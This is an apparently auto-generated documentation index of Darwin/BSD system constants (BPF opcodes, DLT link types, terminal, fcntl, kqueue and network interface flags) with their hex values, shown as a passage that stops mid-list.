BPF_ALU (line 184) | BPF_ALU = 0x4 constant BPF_AND (line 185) | BPF_AND = 0x50 constant BPF_B (line 186) | BPF_B = 0x10 constant BPF_DIV (line 187) | BPF_DIV = 0x30 constant BPF_H (line 188) | BPF_H = 0x8 constant BPF_IMM (line 189) | BPF_IMM = 0x0 constant BPF_IND (line 190) | BPF_IND = 0x40 constant BPF_JA (line 191) | BPF_JA = 0x0 constant BPF_JEQ (line 192) | BPF_JEQ = 0x10 constant BPF_JGE (line 193) | BPF_JGE = 0x30 constant BPF_JGT (line 194) | BPF_JGT = 0x20 constant BPF_JMP (line 195) | BPF_JMP = 0x5 constant BPF_JSET (line 196) | BPF_JSET = 0x40 constant BPF_K (line 197) | BPF_K = 0x0 constant BPF_LD (line 198) | BPF_LD = 0x0 constant BPF_LDX (line 199) | BPF_LDX = 0x1 constant BPF_LEN (line 200) | BPF_LEN = 0x80 constant BPF_LSH (line 201) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 202) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 203) | BPF_MAXBUFSIZE = 0x80000 constant BPF_MAXINSNS (line 204) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 205) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 206) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 207) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 208) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 209) | BPF_MISC = 0x7 constant BPF_MSH (line 210) | BPF_MSH = 0xa0 constant BPF_MUL (line 211) | BPF_MUL = 0x20 constant BPF_NEG (line 212) | BPF_NEG = 0x80 constant BPF_OR (line 213) | BPF_OR = 0x40 constant BPF_RELEASE (line 214) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 215) | BPF_RET = 0x6 constant BPF_RSH (line 216) | BPF_RSH = 0x70 constant BPF_ST (line 217) | BPF_ST = 0x2 constant BPF_STX (line 218) | BPF_STX = 0x3 constant BPF_SUB (line 219) | BPF_SUB = 0x10 constant BPF_TAX (line 220) | BPF_TAX = 0x0 constant BPF_TXA (line 221) | BPF_TXA = 0x80 constant BPF_W (line 222) | BPF_W = 0x0 constant BPF_X (line 223) | BPF_X = 0x8 constant BRKINT (line 224) | BRKINT = 0x2 constant BS0 (line 225) | BS0 = 0x0 constant BS1 (line 226) | BS1 = 0x8000 constant BSDLY (line 227) | BSDLY = 0x8000 constant CFLUSH (line 228) | CFLUSH = 0xf constant CLOCAL (line 229) | CLOCAL = 0x8000 constant CLOCK_MONOTONIC (line 230) | CLOCK_MONOTONIC = 0x6 constant CLOCK_MONOTONIC_RAW (line 231) | CLOCK_MONOTONIC_RAW = 0x4 constant CLOCK_MONOTONIC_RAW_APPROX (line 232) | CLOCK_MONOTONIC_RAW_APPROX = 0x5 constant CLOCK_PROCESS_CPUTIME_ID (line 233) | CLOCK_PROCESS_CPUTIME_ID = 0xc constant CLOCK_REALTIME (line 234) | CLOCK_REALTIME = 0x0 constant CLOCK_THREAD_CPUTIME_ID (line 235) | CLOCK_THREAD_CPUTIME_ID = 0x10 constant CLOCK_UPTIME_RAW (line 236) | CLOCK_UPTIME_RAW = 0x8 constant CLOCK_UPTIME_RAW_APPROX (line 237) | CLOCK_UPTIME_RAW_APPROX = 0x9 constant CLONE_NOFOLLOW (line 238) | CLONE_NOFOLLOW = 0x1 constant CLONE_NOOWNERCOPY (line 239) | CLONE_NOOWNERCOPY = 0x2 constant CR0 (line 240) | CR0 = 0x0 constant CR1 (line 241) | CR1 = 0x1000 constant CR2 (line 242) | CR2 = 0x2000 constant CR3 (line 243) | CR3 = 0x3000 constant CRDLY (line 244) | CRDLY = 0x3000 constant CREAD (line 245) | CREAD = 0x800 constant CRTSCTS (line 246) | CRTSCTS = 0x30000 constant CS5 (line 247) | CS5 = 0x0 constant CS6 (line 248) | CS6 = 0x100 constant CS7 (line 249) | CS7 = 0x200 constant CS8 (line 250) | CS8 = 0x300 constant CSIZE (line 251) | CSIZE = 0x300 constant CSTART (line 252) | CSTART = 0x11 constant CSTATUS (line 253) | CSTATUS = 0x14 constant CSTOP (line 254) | CSTOP = 0x13 constant CSTOPB (line 255) | CSTOPB = 0x400 constant CSUSP (line 256) | CSUSP = 0x1a constant CTLIOCGINFO (line 257) | CTLIOCGINFO = 0xc0644e03 constant CTL_HW (line 258) | CTL_HW = 0x6 constant CTL_KERN (line 259) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 260) | CTL_MAXNAME = 0xc constant CTL_NET (line 261) | CTL_NET = 0x4 constant DLT_A429 (line 262) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 263) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 264) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 265) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 266) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 267) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 268) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 269) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 270) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 271) | DLT_AURORA = 0x7e constant DLT_AX25 (line 272) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 273) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 274) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_HCI_H4 (line 275) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 276) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_CAN20B (line 277) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 278) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 279) | DLT_CHAOS = 0x5 constant DLT_CHDLC (line 280) | DLT_CHDLC = 0x68 constant DLT_CISCO_IOS (line 281) | DLT_CISCO_IOS = 0x76 constant DLT_C_HDLC (line 282) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 283) | DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DBUS (line 284) | DLT_DBUS = 0xe7 constant DLT_DECT (line 285) | DLT_DECT = 0xdd constant DLT_DOCSIS (line 286) | DLT_DOCSIS = 0x8f constant DLT_DVB_CI (line 287) | DLT_DVB_CI = 0xeb constant DLT_ECONET (line 288) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 289) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 290) | DLT_EN3MB = 0x2 constant DLT_ENC (line 291) | DLT_ENC = 0x6d constant DLT_ERF (line 292) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 293) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 294) | DLT_ERF_POS = 0xb0 constant DLT_FC_2 (line 295) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 296) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 297) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 298) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 299) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 300) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 301) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 302) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 303) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 304) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 305) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 306) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 307) | DLT_GSMTAP_UM = 0xd9 constant DLT_HHDLC (line 308) | DLT_HHDLC = 0x79 constant DLT_IBM_SN (line 309) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 310) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 311) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 312) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 313) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 314) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 315) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 316) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NOFCS (line 317) | DLT_IEEE802_15_4_NOFCS = 0xe6 constant DLT_IEEE802_15_4_NONASK_PHY (line 318) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 319) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 320) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_IPFILTER (line 321) | DLT_IPFILTER = 0x74 constant DLT_IPMB (line 322) | DLT_IPMB = 0xc7 constant DLT_IPMB_LINUX (line 323) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPNET (line 324) | DLT_IPNET = 0xe2 constant DLT_IPOIB (line 325) | DLT_IPOIB = 0xf2 constant DLT_IPV4 (line 326) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 327) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 328) | DLT_IP_OVER_FC = 0x7a constant DLT_JUNIPER_ATM1 (line 329) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 330) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_ATM_CEMIC (line 331) | DLT_JUNIPER_ATM_CEMIC = 0xee constant DLT_JUNIPER_CHDLC (line 332) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 333) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 334) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FIBRECHANNEL (line 335) | DLT_JUNIPER_FIBRECHANNEL = 0xea constant DLT_JUNIPER_FRELAY (line 336) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 337) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 338) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 339) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 340) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 341) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 342) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 343) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 344) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 345) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 346) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 347) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_SRX_E2E (line 348) | DLT_JUNIPER_SRX_E2E = 0xe9 constant DLT_JUNIPER_ST (line 349) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 350) | DLT_JUNIPER_VP = 0xb7 constant DLT_JUNIPER_VS (line 351) | DLT_JUNIPER_VS = 0xe8 constant DLT_LAPB_WITH_DIR (line 352) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 353) | DLT_LAPD = 0xcb constant DLT_LIN (line 354) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 355) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 356) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 357) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_PPP_WITHDIRECTION (line 358) | DLT_LINUX_PPP_WITHDIRECTION = 0xa6 constant DLT_LINUX_SLL (line 359) | DLT_LINUX_SLL = 0x71 constant DLT_LOOP (line 360) | DLT_LOOP = 0x6c constant DLT_LTALK (line 361) | DLT_LTALK = 0x72 constant DLT_MATCHING_MAX (line 362) | DLT_MATCHING_MAX = 0x10a constant DLT_MATCHING_MIN (line 363) | DLT_MATCHING_MIN = 0x68 constant DLT_MFR (line 364) | DLT_MFR = 0xb6 constant DLT_MOST (line 365) | DLT_MOST = 0xd3 constant DLT_MPEG_2_TS (line 366) | DLT_MPEG_2_TS = 0xf3 constant DLT_MPLS (line 367) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 368) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 369) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 370) | DLT_MTP3 = 0x8d constant DLT_MUX27010 (line 371) | DLT_MUX27010 = 0xec constant DLT_NETANALYZER (line 372) | DLT_NETANALYZER = 0xf0 constant DLT_NETANALYZER_TRANSPARENT (line 373) | DLT_NETANALYZER_TRANSPARENT = 0xf1 constant DLT_NFC_LLCP (line 374) | DLT_NFC_LLCP = 0xf5 constant DLT_NFLOG (line 375) | DLT_NFLOG = 0xef constant DLT_NG40 (line 376) | DLT_NG40 = 0xf4 constant DLT_NULL (line 377) | DLT_NULL = 0x0 constant DLT_PCI_EXP (line 378) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 379) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 380) | DLT_PFSYNC = 0x12 constant DLT_PPI (line 381) | DLT_PPI = 0xc0 constant DLT_PPP (line 382) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 383) | DLT_PPP_BSDOS = 0x10 constant DLT_PPP_ETHER (line 384) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 385) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 386) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 387) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PPP_WITH_DIRECTION (line 388) | DLT_PPP_WITH_DIRECTION = 0xa6 constant DLT_PRISM_HEADER (line 389) | DLT_PRISM_HEADER = 0x77 constant DLT_PRONET (line 390) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 391) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 392) | DLT_RAW = 0xc constant DLT_RIO (line 393) | DLT_RIO = 0x7c constant DLT_SCCP (line 394) | DLT_SCCP = 0x8e constant DLT_SITA (line 395) | DLT_SITA = 0xc4 constant DLT_SLIP (line 396) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 397) | DLT_SLIP_BSDOS = 0xf constant DLT_STANAG_5066_D_PDU (line 398) | DLT_STANAG_5066_D_PDU = 0xed constant DLT_SUNATM (line 399) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 400) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TZSP (line 401) | DLT_TZSP = 0x80 constant DLT_USB (line 402) | DLT_USB = 0xba constant DLT_USB_DARWIN (line 403) | DLT_USB_DARWIN = 0x10a constant DLT_USB_LINUX (line 404) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 405) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_USER0 (line 406) | DLT_USER0 = 0x93 constant DLT_USER1 (line 407) | DLT_USER1 = 0x94 constant DLT_USER10 (line 408) | DLT_USER10 = 0x9d constant DLT_USER11 (line 409) | DLT_USER11 = 0x9e constant DLT_USER12 (line 410) | DLT_USER12 = 0x9f constant DLT_USER13 (line 411) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 412) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 413) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 414) | DLT_USER2 = 0x95 constant DLT_USER3 (line 415) | DLT_USER3 = 0x96 constant DLT_USER4 (line 416) | DLT_USER4 = 0x97 constant DLT_USER5 (line 417) | DLT_USER5 = 0x98 constant DLT_USER6 (line 418) | DLT_USER6 = 0x99 constant DLT_USER7 (line 419) | DLT_USER7 = 0x9a constant DLT_USER8 (line 420) | DLT_USER8 = 0x9b constant DLT_USER9 (line 421) | DLT_USER9 = 0x9c constant DLT_WIHART (line 422) | DLT_WIHART = 0xdf constant DLT_X2E_SERIAL (line 423) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 424) | DLT_X2E_XORAYA = 0xd6 constant DT_BLK (line 425) | DT_BLK = 0x6 constant DT_CHR (line 426) | DT_CHR = 0x2 constant DT_DIR (line 427) | DT_DIR = 0x4 constant DT_FIFO (line 428) | DT_FIFO = 0x1 constant DT_LNK (line 429) | DT_LNK = 0xa constant DT_REG (line 430) | DT_REG = 0x8 constant DT_SOCK (line 431) | DT_SOCK = 0xc constant DT_UNKNOWN (line 432) | DT_UNKNOWN = 0x0 constant DT_WHT (line 433) | DT_WHT = 0xe constant ECHO (line 434) | ECHO = 0x8 constant ECHOCTL (line 435) | ECHOCTL = 0x40 constant ECHOE (line 436) | ECHOE = 0x2 constant ECHOK (line 437) | ECHOK = 0x4 constant ECHOKE (line 438) | ECHOKE = 0x1 constant ECHONL (line 439) | ECHONL = 0x10 constant ECHOPRT (line 440) | ECHOPRT = 0x20 constant EVFILT_AIO (line 441) | EVFILT_AIO = -0x3 constant EVFILT_EXCEPT (line 442) | EVFILT_EXCEPT = -0xf constant EVFILT_FS (line 443) | EVFILT_FS = -0x9 constant EVFILT_MACHPORT (line 444) | EVFILT_MACHPORT = -0x8 constant EVFILT_PROC (line 445) | EVFILT_PROC = -0x5 constant EVFILT_READ (line 446) | EVFILT_READ = -0x1 constant EVFILT_SIGNAL (line 447) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 448) | EVFILT_SYSCOUNT = 0x11 constant EVFILT_THREADMARKER (line 449) | EVFILT_THREADMARKER = 0x11 constant EVFILT_TIMER (line 450) | EVFILT_TIMER = -0x7 constant EVFILT_USER (line 451) | EVFILT_USER = -0xa constant EVFILT_VM (line 452) | EVFILT_VM = -0xc constant EVFILT_VNODE (line 453) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 454) | EVFILT_WRITE = -0x2 constant EV_ADD (line 455) | EV_ADD = 0x1 constant EV_CLEAR (line 456) | EV_CLEAR = 0x20 constant EV_DELETE (line 457) | EV_DELETE = 0x2 constant EV_DISABLE (line 458) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 459) | EV_DISPATCH = 0x80 constant EV_DISPATCH2 (line 460) | EV_DISPATCH2 = 0x180 constant EV_ENABLE (line 461) | EV_ENABLE = 0x4 constant EV_EOF (line 462) | EV_EOF = 0x8000 constant EV_ERROR (line 463) | EV_ERROR = 0x4000 constant EV_FLAG0 (line 464) | EV_FLAG0 = 0x1000 constant EV_FLAG1 (line 465) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 466) | EV_ONESHOT = 0x10 constant EV_OOBAND (line 467) | EV_OOBAND = 0x2000 constant EV_POLL (line 468) | EV_POLL = 0x1000 constant EV_RECEIPT (line 469) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 470) | EV_SYSFLAGS = 0xf000 constant EV_UDATA_SPECIFIC (line 471) | EV_UDATA_SPECIFIC = 0x100 constant EV_VANISHED (line 472) | EV_VANISHED = 0x200 constant EXTA (line 473) | EXTA = 0x4b00 constant EXTB (line 474) | EXTB = 0x9600 constant EXTPROC (line 475) | EXTPROC = 0x800 constant FD_CLOEXEC (line 476) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 477) | FD_SETSIZE = 0x400 constant FF0 (line 478) | FF0 = 0x0 constant FF1 (line 479) | FF1 = 0x4000 constant FFDLY (line 480) | FFDLY = 0x4000 constant FLUSHO (line 481) | FLUSHO = 0x800000 constant FSOPT_ATTR_CMN_EXTENDED (line 482) | FSOPT_ATTR_CMN_EXTENDED = 0x20 constant FSOPT_NOFOLLOW (line 483) | FSOPT_NOFOLLOW = 0x1 constant FSOPT_NOINMEMUPDATE (line 484) | FSOPT_NOINMEMUPDATE = 0x2 constant FSOPT_PACK_INVAL_ATTRS (line 485) | FSOPT_PACK_INVAL_ATTRS = 0x8 constant FSOPT_REPORT_FULLSIZE (line 486) | FSOPT_REPORT_FULLSIZE = 0x4 constant FSOPT_RETURN_REALDEV (line 487) | FSOPT_RETURN_REALDEV = 0x200 constant F_ADDFILESIGS (line 488) | F_ADDFILESIGS = 0x3d constant F_ADDFILESIGS_FOR_DYLD_SIM (line 489) | F_ADDFILESIGS_FOR_DYLD_SIM = 0x53 constant F_ADDFILESIGS_INFO (line 490) | F_ADDFILESIGS_INFO = 0x67 constant F_ADDFILESIGS_RETURN (line 491) | F_ADDFILESIGS_RETURN = 0x61 constant F_ADDFILESUPPL (line 492) | F_ADDFILESUPPL = 0x68 constant F_ADDSIGS (line 493) | F_ADDSIGS = 0x3b constant F_ALLOCATEALL (line 494) | F_ALLOCATEALL = 0x4 constant F_ALLOCATECONTIG (line 495) | F_ALLOCATECONTIG = 0x2 constant F_BARRIERFSYNC (line 496) | F_BARRIERFSYNC = 0x55 constant F_CHECK_LV (line 497) | F_CHECK_LV = 0x62 constant F_CHKCLEAN (line 498) | F_CHKCLEAN = 0x29 constant F_DUPFD (line 499) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 500) | F_DUPFD_CLOEXEC = 0x43 constant F_FINDSIGS (line 501) | F_FINDSIGS = 0x4e constant F_FLUSH_DATA (line 502) | F_FLUSH_DATA = 0x28 constant F_FREEZE_FS (line 503) | F_FREEZE_FS = 0x35 constant F_FULLFSYNC (line 504) | F_FULLFSYNC = 0x33 constant F_GETCODEDIR (line 505) | F_GETCODEDIR = 0x48 constant F_GETFD (line 506) | F_GETFD = 0x1 constant F_GETFL (line 507) | F_GETFL = 0x3 constant F_GETLK (line 508) | F_GETLK = 0x7 constant F_GETLKPID (line 509) | F_GETLKPID = 0x42 constant F_GETNOSIGPIPE (line 510) | F_GETNOSIGPIPE = 0x4a constant F_GETOWN (line 511) | F_GETOWN = 0x5 constant F_GETPATH (line 512) | F_GETPATH = 0x32 constant F_GETPATH_MTMINFO (line 513) | F_GETPATH_MTMINFO = 0x47 constant F_GETPATH_NOFIRMLINK (line 514) | F_GETPATH_NOFIRMLINK = 0x66 constant F_GETPROTECTIONCLASS (line 515) | F_GETPROTECTIONCLASS = 0x3f constant F_GETPROTECTIONLEVEL (line 516) | F_GETPROTECTIONLEVEL = 0x4d constant F_GETSIGSINFO (line 517) | F_GETSIGSINFO = 0x69 constant F_GLOBAL_NOCACHE (line 518) | F_GLOBAL_NOCACHE = 0x37 constant F_LOG2PHYS (line 519) | F_LOG2PHYS = 0x31 constant F_LOG2PHYS_EXT (line 520) | F_LOG2PHYS_EXT = 0x41 constant F_NOCACHE (line 521) | F_NOCACHE = 0x30 constant F_NODIRECT (line 522) | F_NODIRECT = 0x3e constant F_OK (line 523) | F_OK = 0x0 constant F_PATHPKG_CHECK (line 524) | F_PATHPKG_CHECK = 0x34 constant F_PEOFPOSMODE (line 525) | F_PEOFPOSMODE = 0x3 constant F_PREALLOCATE (line 526) | F_PREALLOCATE = 0x2a constant F_PUNCHHOLE (line 527) | F_PUNCHHOLE = 0x63 constant F_RDADVISE (line 528) | F_RDADVISE = 0x2c constant F_RDAHEAD (line 529) | F_RDAHEAD = 0x2d constant F_RDLCK (line 530) | F_RDLCK = 0x1 constant F_SETBACKINGSTORE (line 531) | F_SETBACKINGSTORE = 0x46 constant F_SETFD (line 532) | F_SETFD = 0x2 constant F_SETFL (line 533) | F_SETFL = 0x4 constant F_SETLK (line 534) | F_SETLK = 0x8 constant F_SETLKW (line 535) | F_SETLKW = 0x9 constant F_SETLKWTIMEOUT (line 536) | F_SETLKWTIMEOUT = 0xa constant F_SETNOSIGPIPE (line 537) | F_SETNOSIGPIPE = 0x49 constant F_SETOWN (line 538) | F_SETOWN = 0x6 constant F_SETPROTECTIONCLASS (line 539) | F_SETPROTECTIONCLASS = 0x40 constant F_SETSIZE (line 540) | F_SETSIZE = 0x2b constant F_SINGLE_WRITER (line 541) | F_SINGLE_WRITER = 0x4c constant F_SPECULATIVE_READ (line 542) | F_SPECULATIVE_READ = 0x65 constant F_THAW_FS (line 543) | F_THAW_FS = 0x36 constant F_TRANSCODEKEY (line 544) | F_TRANSCODEKEY = 0x4b constant F_TRIM_ACTIVE_FILE (line 545) | F_TRIM_ACTIVE_FILE = 0x64 constant F_UNLCK (line 546) | F_UNLCK = 0x2 constant F_VOLPOSMODE (line 547) | F_VOLPOSMODE = 0x4 constant F_WRLCK (line 548) | F_WRLCK = 0x3 constant HUPCL (line 549) | HUPCL = 0x4000 constant HW_MACHINE (line 550) | HW_MACHINE = 0x1 constant ICANON (line 551) | ICANON = 0x100 constant ICMP6_FILTER (line 552) | ICMP6_FILTER = 0x12 constant ICRNL (line 553) | ICRNL = 0x100 constant IEXTEN (line 554) | IEXTEN = 0x400 constant IFF_ALLMULTI (line 555) | IFF_ALLMULTI = 0x200 constant IFF_ALTPHYS (line 556) | IFF_ALTPHYS = 0x4000 constant IFF_BROADCAST (line 557) | IFF_BROADCAST = 0x2 constant IFF_DEBUG (line 558) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 559) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 560) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 561) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 562) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 563) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 564) | IFF_NOARP = 0x80 constant IFF_NOTRAILERS (line 565) | IFF_NOTRAILERS = 0x20 constant IFF_OACTIVE (line 566) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 567) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 568) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 569) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 570) | IFF_SIMPLEX = 0x800 constant IFF_UP (line 571) | IFF_UP = 0x1 constant IFNAMSIZ (line 572) | IFNAMSIZ = 0x10 constant IFT_1822 (line 573) | IFT_1822 = 0x2 constant IFT_6LOWPAN (line 574) | IFT_6LOWPAN = 0x40 constant IFT_AAL5 (line 575) | IFT_AAL5 = 0x31 constant IFT_ARCNET (line 576) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 577) | IFT_ARCNETPLUS = 0x24 constant IFT_ATM (line 578) | IFT_ATM = 0x25 constant IFT_BRIDGE (line 579) | IFT_BRIDGE = 0xd1 constant IFT_CARP (line 580) | IFT_CARP = 0xf8 constant IFT_CELLULAR (line 581) | IFT_CELLULAR = 0xff constant IFT_CEPT (line 582) | IFT_CEPT = 0x13 constant IFT_DS3 (line 583) | IFT_DS3 = 0x1e constant IFT_ENC (line 584) | IFT_ENC = 0xf4 constant IFT_EON (line 585) | IFT_EON = 0x19 constant IFT_ETHER (line 586) | IFT_ETHER = 0x6 constant IFT_FAITH (line 587) | IFT_FAITH = 0x38 constant IFT_FDDI (line 588) | IFT_FDDI = 0xf constant IFT_FRELAY (line 589) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 590) | IFT_FRELAYDCE = 0x2c constant IFT_GIF (line 591) | IFT_GIF = 0x37 constant IFT_HDH1822 (line 592) | IFT_HDH1822 = 0x3 constant IFT_HIPPI (line 593) | IFT_HIPPI = 0x2f constant IFT_HSSI (line 594) | IFT_HSSI = 0x2e constant IFT_HY (line 595) | IFT_HY = 0xe constant IFT_IEEE1394 (line 596) | IFT_IEEE1394 = 0x90 constant IFT_IEEE8023ADLAG (line 597) | IFT_IEEE8023ADLAG = 0x88 constant IFT_ISDNBASIC (line 598) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 599) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISO88022LLC (line 600) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 601) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 602) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 603) | IFT_ISO88025 = 0x9 constant IFT_ISO88026 (line 604) | IFT_ISO88026 = 0xa constant IFT_L2VLAN (line 605) | IFT_L2VLAN = 0x87 constant IFT_LAPB (line 606) | IFT_LAPB = 0x10 constant IFT_LOCALTALK (line 607) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 608) | IFT_LOOP = 0x18 constant IFT_MIOX25 (line 609) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 610) | IFT_MODEM = 0x30 constant IFT_NSIP (line 611) | IFT_NSIP = 0x1b constant IFT_OTHER (line 612) | IFT_OTHER = 0x1 constant IFT_P10 (line 613) | IFT_P10 = 0xc constant IFT_P80 (line 614) | IFT_P80 = 0xd constant IFT_PARA (line 615) | IFT_PARA = 0x22 constant IFT_PDP (line 616) | IFT_PDP = 0xff constant IFT_PFLOG (line 617) | IFT_PFLOG = 0xf5 constant IFT_PFSYNC (line 618) | IFT_PFSYNC = 0xf6 constant IFT_PKTAP (line 619) | IFT_PKTAP = 0xfe constant IFT_PPP (line 620) 